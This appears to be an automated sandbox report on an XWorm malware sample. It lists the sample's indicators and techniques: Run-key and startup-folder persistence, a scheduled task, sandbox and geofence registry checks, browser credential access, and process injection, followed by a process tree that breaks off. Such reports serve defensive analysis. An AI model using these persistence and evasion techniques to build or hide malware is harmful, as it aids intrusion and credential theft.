xworm | d083bef3ab3d00e401c7c14d5c381b34a8d54e81cdb1a7558e3f251330421000

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	x444.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	d083bef3ab3d00e401c7c14d5c381b34a8d54e81cdb1a7558e3f251330421000.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4svchost.lnk	x444.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4svchost.lnk	x444.exe

Executes dropped EXE 8 IoCs

pid	Process
1008	x444.exe
4244	x4Shellcode.exe
1900	alg.exe
1664	elevation_service.exe
872	elevation_service.exe
1320	maintenanceservice.exe
1944	OSE.EXE
3596	x4svchost

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x4svchost = "C:\\Users\\Admin\\AppData\\Roaming\\x4svchost"	x444.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
16	ip-api.com

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\alg.exe	x4Shellcode.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\d07e7ad76c5b9070.bin	alg.exe
File opened for modification	C:\Windows\System32\Tasks\x4svchost	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4976 set thread context of 3112	4976	powershell.EXE	96

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\rmid.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\jabswitch.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\java.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\ssvagent.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaws.exe	alg.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.106\notification_helper.exe	alg.exe
File opened for modification	C:\Program Files\Internet Explorer\ieinstal.exe	alg.exe
File opened for modification	C:\Program Files\Internet Explorer\iexplore.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\java.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javac.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javah.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\kinit.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\javaw.exe	alg.exe
File opened for modification	C:\Program Files\Mozilla Firefox\private_browsing.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe	alg.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	alg.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.106\chrome_pwa_launcher.exe	alg.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jstatd.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\jp2launcher.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateCore.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\jp2launcher.exe	alg.exe
File opened for modification	C:\Program Files\Mozilla Firefox\firefox.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe	alg.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\java.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jps.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\java-rmi.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\javaws.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\unpack200.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	alg.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\mip.exe	alg.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\OFFICE16\LICLUA.EXE	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\kinit.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\klist.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\policytool.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleCrashHandler64.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\extcheck.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\ssvagent.exe	alg.exe
File created	C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log	maintenanceservice.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\Install\{F144ABEA-AC75-413B-997A-58DFC7C8F204}\chrome_installer.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\keytool.exe	alg.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\vlc.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe	alg.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	alg.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javapackager.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javaws.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\ktab.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\ExtExport.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\policytool.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\tnameserv.exe	alg.exe
File opened for modification	C:\Program Files\Mozilla Firefox\maintenanceservice.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\kinit.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\123.0.6312.106\chrome_installer.exe	alg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service	wmiprvse.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

Modifies data under HKEY_USERS 42 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE

Modifies registry class 1 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
3740	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4976	powershell.EXE
4976	powershell.EXE
4976	powershell.EXE
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe
3112	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1008	x444.exe
Token: SeTakeOwnershipPrivilege	4244	x4Shellcode.exe
Token: SeDebugPrivilege	4976	powershell.EXE
Token: SeDebugPrivilege	4976	powershell.EXE
Token: SeDebugPrivilege	3112	dllhost.exe
Token: SeDebugPrivilege	1008	x444.exe
Token: SeAuditPrivilege	2388	svchost.exe
Token: SeDebugPrivilege	3596	x4svchost
Token: SeDebugPrivilege	1900	alg.exe
Token: SeDebugPrivilege	1900	alg.exe
Token: SeDebugPrivilege	1900	alg.exe
Token: SeAssignPrimaryTokenPrivilege	1984	svchost.exe
Token: SeIncreaseQuotaPrivilege	1984	svchost.exe
Token: SeSecurityPrivilege	1984	svchost.exe
Token: SeTakeOwnershipPrivilege	1984	svchost.exe
Token: SeLoadDriverPrivilege	1984	svchost.exe
Token: SeSystemtimePrivilege	1984	svchost.exe
Token: SeBackupPrivilege	1984	svchost.exe
Token: SeRestorePrivilege	1984	svchost.exe
Token: SeShutdownPrivilege	1984	svchost.exe
Token: SeSystemEnvironmentPrivilege	1984	svchost.exe
Token: SeUndockPrivilege	1984	svchost.exe
Token: SeManageVolumePrivilege	1984	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1984	svchost.exe
Token: SeIncreaseQuotaPrivilege	1984	svchost.exe
Token: SeSecurityPrivilege	1984	svchost.exe
Token: SeTakeOwnershipPrivilege	1984	svchost.exe
Token: SeLoadDriverPrivilege	1984	svchost.exe
Token: SeSystemtimePrivilege	1984	svchost.exe
Token: SeBackupPrivilege	1984	svchost.exe
Token: SeRestorePrivilege	1984	svchost.exe
Token: SeShutdownPrivilege	1984	svchost.exe
Token: SeSystemEnvironmentPrivilege	1984	svchost.exe
Token: SeUndockPrivilege	1984	svchost.exe
Token: SeManageVolumePrivilege	1984	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1984	svchost.exe
Token: SeIncreaseQuotaPrivilege	1984	svchost.exe
Token: SeSecurityPrivilege	1984	svchost.exe
Token: SeTakeOwnershipPrivilege	1984	svchost.exe
Token: SeLoadDriverPrivilege	1984	svchost.exe
Token: SeSystemtimePrivilege	1984	svchost.exe
Token: SeBackupPrivilege	1984	svchost.exe
Token: SeRestorePrivilege	1984	svchost.exe
Token: SeShutdownPrivilege	1984	svchost.exe
Token: SeSystemEnvironmentPrivilege	1984	svchost.exe
Token: SeUndockPrivilege	1984	svchost.exe
Token: SeManageVolumePrivilege	1984	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1984	svchost.exe
Token: SeIncreaseQuotaPrivilege	1984	svchost.exe
Token: SeSecurityPrivilege	1984	svchost.exe
Token: SeTakeOwnershipPrivilege	1984	svchost.exe
Token: SeLoadDriverPrivilege	1984	svchost.exe
Token: SeSystemtimePrivilege	1984	svchost.exe
Token: SeBackupPrivilege	1984	svchost.exe
Token: SeRestorePrivilege	1984	svchost.exe
Token: SeShutdownPrivilege	1984	svchost.exe
Token: SeSystemEnvironmentPrivilege	1984	svchost.exe
Token: SeUndockPrivilege	1984	svchost.exe
Token: SeManageVolumePrivilege	1984	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1984	svchost.exe
Token: SeIncreaseQuotaPrivilege	1984	svchost.exe
Token: SeSecurityPrivilege	1984	svchost.exe
Token: SeTakeOwnershipPrivilege	1984	svchost.exe
Token: SeLoadDriverPrivilege	1984	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1704 wrote to memory of 1008	1704	d083bef3ab3d00e401c7c14d5c381b34a8d54e81cdb1a7558e3f251330421000.exe	86
PID 1704 wrote to memory of 1008	1704	d083bef3ab3d00e401c7c14d5c381b34a8d54e81cdb1a7558e3f251330421000.exe	86
PID 1704 wrote to memory of 4244	1704	d083bef3ab3d00e401c7c14d5c381b34a8d54e81cdb1a7558e3f251330421000.exe	87
PID 1704 wrote to memory of 4244	1704	d083bef3ab3d00e401c7c14d5c381b34a8d54e81cdb1a7558e3f251330421000.exe	87
PID 1704 wrote to memory of 4244	1704	d083bef3ab3d00e401c7c14d5c381b34a8d54e81cdb1a7558e3f251330421000.exe	87
PID 4976 wrote to memory of 3112	4976	powershell.EXE	96
PID 4976 wrote to memory of 3112	4976	powershell.EXE	96
PID 4976 wrote to memory of 3112	4976	powershell.EXE	96
PID 4976 wrote to memory of 3112	4976	powershell.EXE	96
PID 4976 wrote to memory of 3112	4976	powershell.EXE	96
PID 4976 wrote to memory of 3112	4976	powershell.EXE	96
PID 4976 wrote to memory of 3112	4976	powershell.EXE	96
PID 4976 wrote to memory of 3112	4976	powershell.EXE	96
PID 3112 wrote to memory of 612	3112	dllhost.exe	5
PID 3112 wrote to memory of 672	3112	dllhost.exe	7
PID 3112 wrote to memory of 948	3112	dllhost.exe	12
PID 3112 wrote to memory of 64	3112	dllhost.exe	13
PID 3112 wrote to memory of 388	3112	dllhost.exe	14
PID 1008 wrote to memory of 3740	1008	x444.exe	97
PID 1008 wrote to memory of 3740	1008	x444.exe	97
PID 672 wrote to memory of 2752	672	lsass.exe	46
PID 672 wrote to memory of 2752	672	lsass.exe	46
PID 3112 wrote to memory of 868	3112	dllhost.exe	15
PID 3112 wrote to memory of 1108	3112	dllhost.exe	17
PID 3112 wrote to memory of 1116	3112	dllhost.exe	18
PID 3112 wrote to memory of 1148	3112	dllhost.exe	19
PID 3112 wrote to memory of 1172	3112	dllhost.exe	20
PID 3112 wrote to memory of 1188	3112	dllhost.exe	21
PID 3112 wrote to memory of 1292	3112	dllhost.exe	22
PID 3112 wrote to memory of 1372	3112	dllhost.exe	23
PID 3112 wrote to memory of 1384	3112	dllhost.exe	24
PID 3112 wrote to memory of 1392	3112	dllhost.exe	25
PID 3112 wrote to memory of 1604	3112	dllhost.exe	26
PID 3112 wrote to memory of 1668	3112	dllhost.exe	27
PID 3112 wrote to memory of 1676	3112	dllhost.exe	28
PID 3112 wrote to memory of 1716	3112	dllhost.exe	29
PID 3112 wrote to memory of 1808	3112	dllhost.exe	30
PID 3112 wrote to memory of 1832	3112	dllhost.exe	31
PID 3112 wrote to memory of 1924	3112	dllhost.exe	32
PID 3112 wrote to memory of 1984	3112	dllhost.exe	33
PID 3112 wrote to memory of 2024	3112	dllhost.exe	34
PID 3112 wrote to memory of 1744	3112	dllhost.exe	35
PID 3112 wrote to memory of 2072	3112	dllhost.exe	36
PID 3112 wrote to memory of 2112	3112	dllhost.exe	37
PID 3112 wrote to memory of 2192	3112	dllhost.exe	38
PID 3112 wrote to memory of 2388	3112	dllhost.exe	40
PID 3112 wrote to memory of 2456	3112	dllhost.exe	41
PID 3112 wrote to memory of 2584	3112	dllhost.exe	42
PID 3112 wrote to memory of 2592	3112	dllhost.exe	43
PID 3112 wrote to memory of 2724	3112	dllhost.exe	44
PID 3112 wrote to memory of 2744	3112	dllhost.exe	45
PID 3112 wrote to memory of 2752	3112	dllhost.exe	46
PID 3112 wrote to memory of 2792	3112	dllhost.exe	47
PID 3112 wrote to memory of 2800	3112	dllhost.exe	48
PID 3112 wrote to memory of 2808	3112	dllhost.exe	49
PID 3112 wrote to memory of 2820	3112	dllhost.exe	50
PID 3112 wrote to memory of 3036	3112	dllhost.exe	51
PID 3112 wrote to memory of 2232	3112	dllhost.exe	52
PID 3112 wrote to memory of 3116	3112	dllhost.exe	53
PID 3112 wrote to memory of 3460	3112	dllhost.exe	55
PID 3112 wrote to memory of 3544	3112	dllhost.exe	56
PID 3112 wrote to memory of 3648	3112	dllhost.exe	57
PID 3112 wrote to memory of 3856	3112	dllhost.exe	58
PID 3112 wrote to memory of 4008	3112	dllhost.exe	60

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:64
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{46c2ea4a-e9ef-4341-a2b4-8ecf73bb93de}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3112

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:388

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:868

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1108
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:3036
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
